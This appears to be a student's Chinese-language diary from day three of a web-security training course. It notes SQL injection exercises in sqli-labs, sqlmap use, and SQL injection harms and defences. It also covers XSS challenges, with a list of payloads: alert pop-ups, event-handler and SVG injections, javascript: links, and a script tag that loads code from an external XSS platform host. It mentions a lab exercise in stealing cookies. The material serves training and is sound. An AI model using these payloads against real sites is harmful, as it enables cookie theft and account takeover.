实训第三天
- 虚拟机安装和配置sqli-labs
物理机访问:
- sqli-labs练习
Less-5:盲注
Less-7:文件注入
Less-9:延时注入
Less-5:报错注入,使用extravalue
爆出数据库名
爆出数据表名
Less-11:post法+联合注入
Less-12:双引号+括号闭合
- 初步了解sqlmap的使用
- 了解sql注入
概念和原理:攻击者通过注入sql语句片段,导致后端执行预期外的sql查询
危害:1.拖库 2.读写文件 3.执行系统命令
防护思路:对输入的特殊字符进行转义;正确使用预编译技术进行防护;非必要不开启文件和命令执行权限;进行库和用户的权限隔离
- 观看学习xss(cross site scripting)演示,学习xss的基本知识和攻击目的:攻击者嵌入自己的恶意js代码,使其他用户浏览器执行
- 实战btslab练习XSS窃取cookie并利用
- 编写有弹窗的页面
- xss挑战
level-1:尝试用输入的js元素替换test,使得页面弹窗。
level-2:闭合input标签
js的各种引入方式
<script>alert(1);</script> //直接嵌入script
<input name=keyword value="" onmouseover="alert(1)"> //通过事件属性值传入script字符串
<script src='https://xsspt.com/MQzN0Z'></script> //从远程嵌入script
<a HREF=javascript:alert(1)>aaa</a> //超链接
或者:<a HREF=javascript:alert(1)>aaa</a> //html实体转义
<svg onload=alert(1)>
<svg><script>alert(1)</script>